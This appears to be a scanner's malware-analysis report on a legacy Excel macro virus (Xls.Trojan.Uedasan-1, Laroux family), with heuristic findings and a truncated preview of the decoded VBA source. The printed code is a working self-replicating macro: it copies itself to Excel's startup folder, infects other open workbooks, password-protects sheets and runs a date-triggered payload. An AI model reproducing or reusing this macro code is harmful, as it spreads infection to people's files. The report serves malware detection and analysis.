MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as a malicious Excel 5.0 macro-virus, specifically 'Xls.Trojan.Uedasan-1', by multiple critical heuristics. The Auto_open macro attempts to copy itself to the Excel startup directory using a constructed filename that includes a random number, likely to evade detection. This behavior suggests an attempt to establish persistence or drop a second-stage payload.
Heuristics 4
-
ClamAV: Xls.Trojan.Uedasan-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Uedasan-1
-
Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUSLegacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22558 bytes |
SHA-256: 03c9d2fbf75e293355f3d35c506898740dfa8e619e12729d24bfd2bd6070d5e8 |
|||
|
Detection
ClamAV:
Xls.Trojan.Uedasan-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = " A-TPC "
'
'
'
'
'
'
Option Explicit
Public Const Id As String = "#1SLIDER.XLA"
Public m_id As String
Sub Auto_open()
Attribute Auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim chklog As Variant
Dim cpotting, wafer, idhld As String
Dim bookname, c4 As String
nexts
m_id = Chr(32) + Chr(65) & "-" & Chr(84) + Chr(80) + Chr(67) + Chr(32)
cpotting = Application.StartupPath & Application.PathSeparator
make cpotting
wafer = Dir(cpotting & Id)
If UCase(wafer) = "" Then
Application.ScreenUpdating = False
Workbooks.Add (xlWorksheet)
ActiveWindow.DisplayWorkbookTabs = False
ThisWorkbook.Sheets(m_id).Visible = True
ThisWorkbook.Sheets(m_id).Copy before:=ActiveWorkbook.Sheets(1)
ThisWorkbook.Sheets(m_id).Visible = False
With ActiveWorkbook
.Title = "#$%#$%#$@#@##$$$####@@@#@##$%$%$%^"
.Subject = "«Ü.++I¤¦XJ-K_æ"
.Author = "@@!@!@!#$#$%^**&%#^%^***"
.Keywords = ">>>>>>>>>>>>>>>>>> F.Y."
.Comments = "+666.............13.............OMEN+"
End With
idhld = Id
For Each chklog In Application.Workbooks
If chklog.Name = Id Then
Randomize
idhld = Id & Rnd()
End If
Next
bookname = ActiveWorkbook.Name
c4 = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(bookname).SaveAs filename:=cpotting & idhld, FileFormat:=xlNormal, CreateBackup:=True
ThisWorkbook.Sheets(1).Visible = False
ChDir c4
Application.ScreenUpdating = False
End If
Application.OnSheetActivate = Id & "!scan"
End Sub
Private Sub make(ByVal locat As String)
On Error Resume Next
Err = 0
MkDir Left(locat, 25)
If Err <> 0 Then
Exit Sub
End If
End Sub
Private Function coding()
Dim TESTER As Range
Dim logentry As Variant
coding = False
For Each logentry In Application.Worksheets
Set TESTER = Worksheets(logentry.Name).Range(Chr(97) + Chr(49) + Chr(54) + Chr(51) + Chr(56) + Chr(52))
If TESTER = Chr(117) + Chr(101) + Chr(100) + Chr(97) + Chr(115) + Chr(97) + Chr(110) Then
coding = True
Exit For
End If
Next
End Function
Sub scan()
Attribute scan.VB_ProcData.VB_Invoke_Func = " \n14"
Dim checking, chkstruc As Boolean
Dim no1, slider As String
Dim LOGNAME As Variant
checking = False
m_id = Chr(32) + Chr(65) & "-" & Chr(84) + Chr(80) + Chr(67) + Chr(32)
On Error Resume Next
Err = 0
chkstruc = ActiveWorkbook.ProtectStructure
If Err <> 0 Then GoTo placeb
If chkstruc = False Then
Application.ScreenUpdating = False
no1 = ActiveWorkbook.Name
slider = Workbooks(no1).Sheets(1).Name
For Each LOGNAME In Application.Modules
If LOGNAME.Name = m_id Then
checking = True
ElseIf LOGNAME.Name = "me" Then
MsgBox "WARNING : VIRUS DETECTED! NAME : 'XM.Laroux.DP'"
ElseIf LOGNAME.Name = "pldt" Then
MsgBox "WARNING : VIRUS DETECTED! NAME : 'MERALCO'"
ElseIf Len(LOGNAME.Name) >= 25 Then
MsgBox "WARNING : VIRUS DETECTED! NAME : 'XM.Extras.A'"
End If
Next
If checking = False And Not coding Then
Workbooks(Id).Sheets(m_id).Copy before:=Workbooks(no1).Sheets(1)
ActiveWorkbook.Sheets(1).Protect password:=Chr(117) + Chr(101) + Chr(100) + Chr(97) + Chr(115) + Chr(97) + Chr(110)
Workbooks(no1).Sheets(m_id).Visible = False
Status
End If
End If
placeb:
Application.ScreenUpdating = False
End Sub
Private Sub Status()
If Month(Now) = Int(Sqr((355 / Sqr(3995) * ((31 / 4) * 4) ^ 2))) - 69 Then
DO_EVERYTHING
End If
If (Month(Now) >= Int(Sqr((355 / Sqr(3995) * ((31 / 4) * 4) ^ 2))) - 69 _
And Hour(Now) < Int(Sqr(4 * 62) / 2.6)) Then
DO_SOMETHING
End If
End Sub
P
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.